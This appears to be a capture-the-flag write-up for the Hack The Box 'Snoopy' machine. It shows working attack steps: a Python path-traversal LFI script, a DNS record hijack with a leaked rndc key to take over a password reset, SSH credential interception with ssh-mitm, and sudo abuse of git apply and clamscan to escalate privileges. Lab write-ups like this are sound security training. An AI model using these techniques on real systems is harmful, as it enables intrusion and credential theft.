$ nmap -p- --min-rate 5000 10.129.85.193
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-09 05:05 EDT
Warning: 10.129.85.193 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.85.193
Host is up (0.16s latency).
Not shown: 65305 closed tcp ports (conn-refused), 227 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
We can add snoopy.htb to our /etc/hosts file as per standard HTB practice.
DNS and HTTP Enumeration
This was a corporate page that provides DevSecOps services:
Looking around, there's another subdomain present in the form of a mail server.
It syas that the DNS records are being migrated to another domain and that their email server is offline. We can run both a gobuster directory and wfuzz subdomain scan first. The subdomain scan reveals a mm subdomain present.
$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H 'Host:FUZZ.snoopy.htb' --hw=1818 -u http://snoopy.htb
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://snoopy.htb/
Total requests: 19966
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000582: 200 0 L 141 W 3132 Ch "mm"
Interesting. Since DNS is open, and there is already a hint for DNS being in play somehow, we can enumerate that using dig.
$ dig axfr @10.129.85.79 snoopy.htb
; <<>> DiG 9.18.8-1-Debian <<>> axfr @10.129.85.79 snoopy.htb
; (1 server found)
;; global options: +cmd
snoopy.htb. 86400 IN SOA ns1.snoopy.htb. ns2.snoopy.htb. 2022032612 3600 1800 604800 86400
snoopy.htb. 86400 IN NS ns1.snoopy.htb.
snoopy.htb. 86400 IN NS ns2.snoopy.htb.
mattermost.snoopy.htb. 86400 IN A 172.18.0.3
mm.snoopy.htb. 86400 IN A 127.0.0.1
ns1.snoopy.htb. 86400 IN A 10.0.50.10
ns2.snoopy.htb. 86400 IN A 10.0.51.10
postgres.snoopy.htb. 86400 IN A 172.18.0.2
provisions.snoopy.htb. 86400 IN A 172.18.0.4
www.snoopy.htb. 86400 IN A 127.0.0.1
snoopy.htb. 86400 IN SOA ns1.snoopy.htb. ns2.snoopy.htb. 2022032612 3600 1800 604800 86400
;; Query time: 172 msec
;; SERVER: 10.129.85.79#53(10.129.85.79) (TCP)
;; WHEN: Tue May 09 08:42:40 EDT 2023
;; XFR size: 11 records (messages 1, bytes 325)
It seems that mm stands for MatterMost. There's another provisions and postgres subdomain that is present on the local network within the machine, which I probably need to enumerate after gaining a foothold. It appears that snoopy.htb and mm.snoopy.htb are on the same IP address, while the others are not, meaning that we cannot access the others yet probably.
The last thing is that mail.snoopy.htb is not present within the records and is indeed offline.
We can visit the mm subdomain to verify that it is running:
We don't have any credentials, but there is a Password Reset in use here that requires an email address:
Lastly, there are some emails present:
Download LFI -> DNS Vuln
On the main page, there is an option to download files. When we click that, this HTTP request is sent:
GET /download?file=announcement.pdf HTTP/1.1Host:snoopy.htbUser-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateConnection:closeReferer:http://provisions.snoopy.htb/Upgrade-Insecure-Requests:1
The announcement.pdf file had nothing interesting itself, but this looks vulnerable to LFI. Inital testing reveals this isn't vulnerable at first:
After using ....// instead, we can see that a file is generated:
When the file is downloaded and viewed, we see that it works!
These were the most interesting users, and there was a clamav and bind user, which was something I don't usually find. This means that these softwares must be downloaded on the machine. Anyways, the process for LFI is quite long and slow, so to quickly enumerate the machine, I made a quick Python script to do so:
import requestsimport zipfiledefread(file):try: url ='http://provisions.snoopy.htb/download' params ={'file':f'....//....//....//....//....//....//....//....//....//....//....//..../{file}'} r = requests.get(url, params=params)if (r.status_code ==200):withopen('lfime.zip', 'wb')as f: f.write(r.content)with zipfile.ZipFile('lfime.zip', 'r')as zip_file: zip_file.extractall('.')withopen(f'press_package{file}', 'r')as f: content = f.read()print(f"{content}")else:print("[-] File does not exist.")except zipfile.BadZipFile:print("[-] File does not exist.")exceptExceptionas e:print(f"[-] LFI Error: {e}.")defmain():whileTrue: file =input("File: ")read(file)if__name__=='__main__':main()
This made enumeration a lot easier. Now, we can proceed with enumeration of the file system and other sensitive files. We can start with /etc/nginx/sites-available/default.
root /var/www/html;
# Add index.php to the list if you are using PHP
index index.html index.htm index.nginx-debian.html;
server_name _;
location / {
# First attempt to serve request as file, then
# as directory, then fall back to displaying a 404.
try_files $uri $uri/ =404;
}
location ~ ^/download$ {
alias /var/www/html/download.php;
fastcgi_pass unix:/var/run/php/php8.1-fpm.sock;
fastcgi_param SCRIPT_FILENAME $request_filename;
include fastcgi_params;
}
location ~ \.php$ {
include fastcgi_params;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
}
<TRUNCATED>
There's nothing much here. Earlier we found that bind was running on the server. bind is a nameserver program that assigns the domain names to IP addresses. In this case, since the mail server is offline as DNS records are being migrated, we might be able to exploit this by making the machine resolve mail.snoopy.htb to our machine and then using it to reset passwords on MatterMost.
Quick googling reveals that the /etc/bind/named.conf folder contains the configuration for it.
// This is the primary configuration file for the BIND DNS server named.
//
// Please read /usr/share/doc/bind9/README.Debian.gz for information on the
// structure of BIND configuration files in Debian, *BEFORE* you customize
// this configuration file.
//
// If you are just adding zones, please do that in /etc/bind/named.conf.local
include "/etc/bind/named.conf.options";
include "/etc/bind/named.conf.local";
include "/etc/bind/named.conf.default-zones";
key "rndc-key" {
algorithm hmac-sha256;
secret "BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=";
};
This contains a secret of some sort, and it is clear that updating the DNS records to point to our machine is the exploit here. A bit of Googling about how to update DNS records led me to the nsupdate documentation page:
We can use the entire key "rndc-key" part as the key file specified using -k. Then, we can run the following commands to update the records AND set up a SMTP server:
Now we need to find a user who exists on the MatterMost software. After some testing, it seems that sbrown@snoopy.htb works based on the emails we found, because sending a password reset using that email works!
$ python3 -m smtpd -n -c DebuggingServer 10.10.14.9:25
---------- MESSAGE FOLLOWS ----------
mail options: ['BODY=8BITMIME']
b'MIME-Version: 1.0'
b'Subject: [Mattermost] Reset your password'
b'Content-Transfer-Encoding: 8bit'
b'Precedence: bulk'
b'Reply-To: "No-Reply" <no-reply@snoopy.htb>'
b'Message-ID: <hcy7iqt7goortome-1683638004@mm.snoopy.htb>'
b'To: sbrown@snoopy.htb'
b'Auto-Submitted: auto-generated'
b'From: "No-Reply" <no-reply@snoopy.htb>'
b'Date: Tue, 09 May 2023 13:13:24 +0000'
b'Content-Type: multipart/alternative;'
b' boundary=1eb180a975434612f4fc222189f028924f0b3953f96434f4a070947e60ef'
b'X-Peer: 10.129.85.79'
b''
b'--1eb180a975434612f4fc222189f028924f0b3953f96434f4a070947e60ef'
b'Content-Transfer-Encoding: quoted-printable'
b'Content-Type: text/plain; charset=UTF-8'
b''
b'Reset Your Password'
b'Click the button below to reset your password. If you didn=E2=80=99t reques='
b't this, you can safely ignore this email.'
b''
b'Reset Password ( http://mm.snoopy.htb/reset_password_complete?token=3Db4akc='
b'wn9adntaawingkbho8ctcyzfscm51zjjey7ayx5nzsaxstg7g89ganb8res )'
The token has some weird signs in the middle of it, which is not normal actually. Although the link is valid, the token is not. In the above's case, we can ignore all the = and 3D parts, so the correct link is:
Afterwards, we can reset the password and see that it works here:
Then we can login.
MatterMost -> SSH MITM
When we login, we can see a ton of chat logs:
It talks about ClamAV being used as the anti-virus, and also about some provisioning server. We can view the different commands present on this:
There was a weird command /server_provision without any description. When run, it opens up a UI that seems to spawn a server:
We can fill it in to have our credentials and required details. It appears that Windows is disabled too:
Anyways, after filling in the fields and clicking submit, we get this weird thing on a listener port:
I thought that it would be a shell and hence ran id, but it quickly closed. In this case, I took a look at the traffic within wireshark but wasn't able to find out much. I tried out a few methods from the SSH page of Hacktricks, and found ssh-mitm.
This was a program that would intercept SSH traffic and find a password, similar to what responder does.
I couldn't get the ssh-mitm binary to work properly, but thankfully there's a Python module for it. We can run it, then we can view the logs:
$ python3 -m sshmitm server --remote-host 10.129.85.79 --listen-port 2222
───────────────────────────── SSH-MITM - ssh audits made simple ─────────────────────────────
Version: 3.0.2
License: GNU General Public License v3.0
Documentation: https://docs.ssh-mitm.at
Issues: https://github.com/ssh-mitm/ssh-mitm/issues
─────────────────────────────────────────────────────────────────────────────────────────────
generated temporary RSAKey key with 2048 bit length and fingerprints:
MD5:10:a0:ac:54:66:eb:ca:14:62:88:fe:d0:3c:c0:68:f0
SHA256:IQjHvAVwgc+rsZSuahdUQKTfdba5dqKxLpRd39PNNhA
SHA512:beq/m46uHTY42gBA5u7lFh0alXfK4hc68WMJNvDpEMVl8TeOGQHU89NuGDTwL466Ja//FKDF1/HQMnJBS3mA6w
listen interfaces 0.0.0.0 and :: on port 2222
────────────────────────────────── waiting for connections ──────────────────────────────────
[05/09/23 09:40:06] INFO ℹ session 9a94617f-be69-49bf-90fd-765beb3fbeee
created
INFO ℹ client information:
- client version: ssh-2.0-paramiko_3.1.0
- product name: Paramiko
- vendor url: https://www.paramiko.org/
⚠ client audit tests:
* client uses same server_host_key_algorithms list for
unknown and known hosts
* Preferred server host key algorithm: ssh-ed25519
[05/09/23 09:40:08] INFO Remote authentication succeeded
Remote Address: 10.129.85.79:22
Username: cbrown
Password: sn00pedcr3dential!!!
Agent: no agent
We have a credential! With this, we can ssh in as the user cbrown:
Privilege Escalation
No user flag yet.
Sudo Git Apply -> User
Checking our sudo privileges, we see this:
cbrown@snoopy:~$ sudo -l
[sudo] password for cbrown:
Matching Defaults entries for cbrown on snoopy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User cbrown may run the following commands on snoopy:
(sbrown) PASSWD: /usr/bin/git apply *
We can run commands as sbrown using git apply *. This means using a diff output, we can use this to overwrite any file that sbrown owns. In this case, we can put our public SSH key within the .ssh/authorized_keys folder.
Then, we can use diff on a random folder and this folder. We can use the .bash_history file of cbrown because it has nothing within it:
cbrown@snoopy:/home$ git diff cbrown/.bash_history cbrown/.ssh/authorized_keys
diff --git a/cbrown/.bash_history b/cbrown/.bash_history
deleted file mode 120000
index dc1dc0c..0000000
--- a/cbrown/.bash_history
+++ /dev/null
@@ -1 +0,0 @@
-/dev/null
\ No newline at end of file
diff --git a/cbrown/.ssh/authorized_keys b/cbrown/.ssh/authorized_keys
new file mode 100644
index 0000000..8e881d1
--- /dev/null
+++ b/cbrown/.ssh/authorized_keys
@@ -0,0 +1 @@
+ssh-rsa KEY kali@kali
Then, we can redirect the above to another file like /tmp/diff. Afterwards, we need to change the target file (the one below) to sbrown/.ssh/authorized_keys in order to write the key within it.
Here's the final diff file I used:
cbrown@snoopy:/home$ cat /tmp/diff
diff --git a/cbrown/.bash_history b/cbrown/.bash_history
deleted file mode 120000
index dc1dc0c..0000000
--- a/cbrown/.bash_history
+++ /dev/null
@@ -1 +0,0 @@
-/dev/null
\ No newline at end of file
diff --git a/sbrown/.ssh/authorized_keys b/sbrown/.ssh/authorized_keys
new file mode 100644
index 0000000..8e881d1
--- /dev/null
+++ b/cbrown/.ssh/authorized_keys
@@ -0,0 +1 @@
+ssh-rsa KEY kali@kali
Afterwards, just run the sudo command on the /tmp/diff file. This would put our public key within the sbrown directory since we are running the command as sbrown. Then, we can ssh in.
Grab the user flag.
Sudo Clamscan -> Root
When checking sudo privileges again, I found that we can run clamscan as root.
sbrown@snoopy:~$ sudo -l
Matching Defaults entries for sbrown on snoopy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User sbrown may run the following commands on snoopy:
(root) NOPASSWD: /usr/local/bin/clamscan
clamscan is a scanner that checks for malware and other things within binaries:
Based on the documentation, since we can run this as root, we should be able to read files like /etc/shadow. This can be done using the -f flag and it works as shown:
Then, we can simply read the private SSH key of root located at /root/.ssh/id_rsa.
